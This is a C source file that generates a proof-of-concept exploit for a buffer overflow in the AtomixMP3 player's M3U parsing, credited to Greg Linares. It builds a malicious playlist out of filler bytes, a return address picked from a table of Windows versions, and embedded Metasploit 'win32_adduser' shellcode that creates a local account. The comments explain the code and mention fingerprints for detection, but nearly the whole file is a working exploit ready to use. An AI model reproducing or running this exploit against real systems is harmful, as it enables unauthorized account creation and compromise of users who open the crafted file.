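#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/*
 * Generator for the AtomixMP3 <= v2.3 M3U buffer overflow proof of concept
 * (Greg Linares).  It writes one .m3u file whose second entry is an
 * over-long path: "C:\" followed by PAD_LEN filler bytes, a 4-byte "JMP"
 * value chosen from the menu below (argument 2, 1..9, default 1), the
 * embedded scode[] payload, and a trailing CRLF.
 *
 * Output layout, in write order:
 *   "#EXTM3U\r\n#EXTINF:0," + title line
 *   "C:\"
 *   PAD_LEN bytes of 'A'
 *   4 bytes from jmp_table[choice - 1]
 *   scode[] (NUL-terminated, written with fputs)
 *   "\r\n"
 *
 * For detection purposes the artifact is easy to fingerprint: the literal
 * title line and a run of PAD_LEN 'A' bytes immediately after "C:\".
 */

/* Buffer size and filler length as in the original (520 - 4). */
enum { BUF_SIZE = 525, PAD_LEN = 520 - 4, JMP_COUNT = 9 };

/* One menu choice: the message printed on selection and the 4 bytes emitted. */
struct jmp_choice {
    const char *label;
    unsigned char bytes[4];
};

/* Indexed by (choice - 1).  Labels and byte values are the original ones. */
static const struct jmp_choice jmp_table[JMP_COUNT] = {
    { "Using English Windows XP SP2 JMP...\n",                                   { 0xbc, 0x41, 0xdb, 0x77 } },
    { "Using English Windows XP SP1 JMP...\n",                                   { 0xfc, 0x18, 0xd7, 0x77 } },
    { "Using English Windows 2003 SP0 & SP1 JMP...\n",                           { 0xdc, 0x4a, 0xd7, 0x77 } },
    { "Using English Windows 2000 SP 4 JMP...\n",                                { 0x56, 0xc2, 0xe3, 0x77 } },
    { "Using French Windows XP SP 2 JMP...\n",                                   { 0x9f, 0x51, 0xd8, 0x77 } },
    { "Using German/Italian/Dutch/Polish Windows XP SP 2 JMP...\n",              { 0xa0, 0x73, 0xd8, 0x77 } },
    { "Using Spainish Windows XP SP 2 JMP...\n",                                 { 0x2f, 0x93, 0xd9, 0x77 } },
    { "Using French/Italian/German/Polish/Dutch Windows 2000 Pro SP 4 JMP...\n", { 0x29, 0x4c, 0xe0, 0x77 } },
    { "Using French/Italian/Chineese Windows 2000 Server SP 4 JMP...\n",         { 0x29, 0x4c, 0xdf, 0x77 } },
};

/*
 * Entry point.
 *   argv[1]  path of the .m3u file to create (required)
 *   argv[2]  menu choice 1..9 (optional; anything else, or absent, means 1)
 * Returns 0 on success, 1 on bad arguments or when the file cannot be
 * opened or closed cleanly.
 */
int main(int argc, char *argv[])
{
    /* win32_adduser - PASS=prueba EXITFUNC=seh USER=prueba Size=488
       Encoder=Alpha2 http://metasploit.com */
    static const unsigned char scode[] =
        "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
        "\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x48\x5a\x6a\x68"
        "\x58\x50\x30\x42\x31\x42\x41\x6b\x41\x41\x78\x41\x32\x41\x41\x32"
        "\x42\x41\x30\x42\x41\x58\x50\x38\x41\x42\x75\x4b\x59\x59\x6c\x6d"
        "\x38\x67\x34\x75\x50\x55\x50\x75\x50\x6c\x4b\x67\x35\x67\x4c\x6e"
        "\x6b\x73\x4c\x67\x75\x53\x48\x45\x51\x5a\x4f\x4e\x6b\x70\x4f\x35"
        "\x48\x4e\x6b\x53\x6f\x47\x50\x56\x61\x5a\x4b\x57\x39\x4c\x4b\x46"
        "\x54\x4c\x4b\x45\x51\x48\x6e\x37\x41\x6f\x30\x4f\x69\x4c\x6c\x4f"
        "\x74\x4f\x30\x32\x54\x37\x77\x49\x51\x59\x5a\x36\x6d\x65\x51\x4b"
        "\x72\x78\x6b\x69\x64\x37\x4b\x61\x44\x46\x44\x45\x54\x51\x65\x4b"
        "\x55\x4c\x4b\x71\x4f\x74\x64\x77\x71\x78\x6b\x35\x36\x6e\x6b\x46"
        "\x6c\x70\x4b\x4c\x4b\x51\x4f\x67\x6c\x47\x71\x48\x6b\x4c\x4b\x77"
        "\x6c\x6e\x6b\x63\x31\x38\x6b\x4d\x59\x61\x4c\x71\x34\x53\x34\x38"
        "\x43\x50\x31\x4f\x30\x63\x54\x6e\x6b\x57\x30\x54\x70\x4e\x65\x4b"
        "\x70\x70\x78\x44\x4c\x4e\x6b\x57\x30\x54\x4c\x4c\x4b\x44\x30\x47"
        "\x6c\x4c\x6d\x6c\x4b\x53\x58\x65\x58\x4a\x4b\x37\x79\x6e\x6b\x4f"
        "\x70\x6c\x70\x65\x50\x67\x70\x53\x30\x6c\x4b\x73\x58\x67\x4c\x71"
        "\x4f\x55\x61\x6c\x36\x31\x70\x71\x46\x4f\x79\x4b\x48\x6b\x33\x69"
        "\x50\x41\x6b\x76\x30\x53\x58\x4c\x30\x4d\x5a\x45\x54\x73\x6f\x61"
        "\x78\x5a\x38\x6b\x4e\x4d\x5a\x76\x6e\x76\x37\x6b\x4f\x6b\x57\x50"
        "\x63\x50\x6d\x45\x34\x44\x6e\x31\x75\x34\x38\x73\x55\x55\x70\x36"
        "\x4f\x33\x53\x45\x70\x52\x4e\x51\x75\x70\x74\x41\x30\x41\x65\x42"
        "\x53\x75\x35\x32\x52\x61\x30\x42\x50\x72\x52\x62\x55\x30\x65\x42"
        "\x42\x55\x31\x55\x70\x64\x30\x31\x62\x52\x55\x33\x55\x70\x62\x33"
        "\x51\x45\x70\x34\x6f\x61\x51\x63\x74\x37\x34\x47\x50\x35\x76\x37"
        "\x56\x37\x50\x70\x6e\x35\x35\x52\x54\x57\x50\x52\x4c\x52\x4f\x43"
        "\x53\x32\x41\x70\x6c\x51\x77\x50\x72\x30\x6f\x70\x75\x64\x30\x37"
        "\x50\x32\x61\x50\x64\x70\x6d\x41\x79\x72\x4e\x30\x69\x32\x53\x72"
        "\x54\x43\x42\x61\x71\x50\x74\x50\x6f\x62\x52\x71\x63\x65\x70\x34"
        "\x30\x41\x62\x33\x45\x51\x75\x63\x52\x51\x71\x71\x30\x34\x6f\x70"
        "\x41\x70\x44\x31\x54\x65\x50\x68"; /* replace it with your own shellcode :) */

    /* argv[0] may be NULL when argc == 0; printf("%s", NULL) is UB. */
    const char *prog = (argc > 0 && argv[0] != NULL) ? argv[0] : "";

    printf("\n======================================================================\n");
    printf("AtomixMP3 <= v2.3 M3U Buffer Overflow Exploit\n");
    printf("Discovered and Coded By: Greg Linares \n");
    printf("Usage: %s \n", prog);
    printf("\n JMP Options\n");
    printf("1 = English Windows XP SP 2 User32.dll \n");
    printf("2 = English Windows XP SP 1 User32.dll \n");
    printf("3 = English Windows 2003 SP0 and SP1 User32.dll \n");
    printf("4 = English Windows 2000 SP 4 User32.dll \n");
    printf("5 = French Windows XP Pro SP2 \n");
    printf("6 = German/Italian/Dutch/Polish Windows XP SP2 \n");
    printf("7 = Spainish Windows XP Pro SP2 \n");
    printf("8 = French/Italian/German/Polish/Dutch Windows 2000 Pro SP4 \n");
    printf("9 = French/Italian/Chineese Windows 2000 Server SP4 \n");
    printf("====================================================================\n\n\n");
    /* thanks metasploit and jerome for opcodes */

    if (argc < 2) {
        printf("Invalid Number Of Arguments\n");
        return 1;
    }

    FILE *out = fopen(argv[1], "w");
    if (!out) {
        printf("\nCouldn't Open File!");
        return 1;
    }

    fputs("#EXTM3U\r\n#EXTINF:0,", out);
    fputs("0-day_AtomixMP3_M3U_Buffer_Overflow_Exploit_By_Greg_Linares\r\n", out);
    fputs("C:\\", out);

    /* PAD_LEN filler bytes.  The original built this with PAD_LEN strcat()
       calls on a zeroed buffer (O(n^2)); a memset produces the same bytes. */
    char buffer[BUF_SIZE];
    memset(buffer, 'A', PAD_LEN);
    buffer[PAD_LEN] = '\0';
    fputs(buffer, out);

    /* The original read argv[2] without checking argc, an out-of-bounds read
       (NULL dereference in atoi) whenever only the output path was given.
       A missing or out-of-range selector falls back to choice 1, which is
       exactly what the original's range check did for atoi() <= 0 or > 9. */
    int choice = (argc > 2) ? atoi(argv[2]) : 0;
    if (choice <= 0 || choice > JMP_COUNT) {
        choice = 1;
    }
    const struct jmp_choice *jc = &jmp_table[choice - 1];
    printf("%s", jc->label);
    /* None of the 4-byte values contain NUL, so this equals the original fputs. */
    fwrite(jc->bytes, 1, sizeof jc->bytes, out);

    /* scode[] is NUL-terminated by the string-literal initializer; fputs
       writes exactly its Size=488 bytes. */
    fputs((const char *)scode, out);
    fputs("\r\n", out);

    /* fclose() performs the final flush; only report success once it passed,
       otherwise the file on disk may be truncated. */
    if (fclose(out) != 0) {
        printf("\nCouldn't Close File!");
        return 1;
    }

    printf("Exploit Succeeded...\n Output File: %s\n\n", argv[1]);
    printf("Exploit Coded by Greg Linares (GLinares.code[at]gmail[dot]com)\n");
    printf("Greetz to: Everyone at EEye, Metasploit Crew, Jerome Athias and Expanders - Thanks For The Ideas, Tools and Alpha2 Shell Code\n");
    return 0;
}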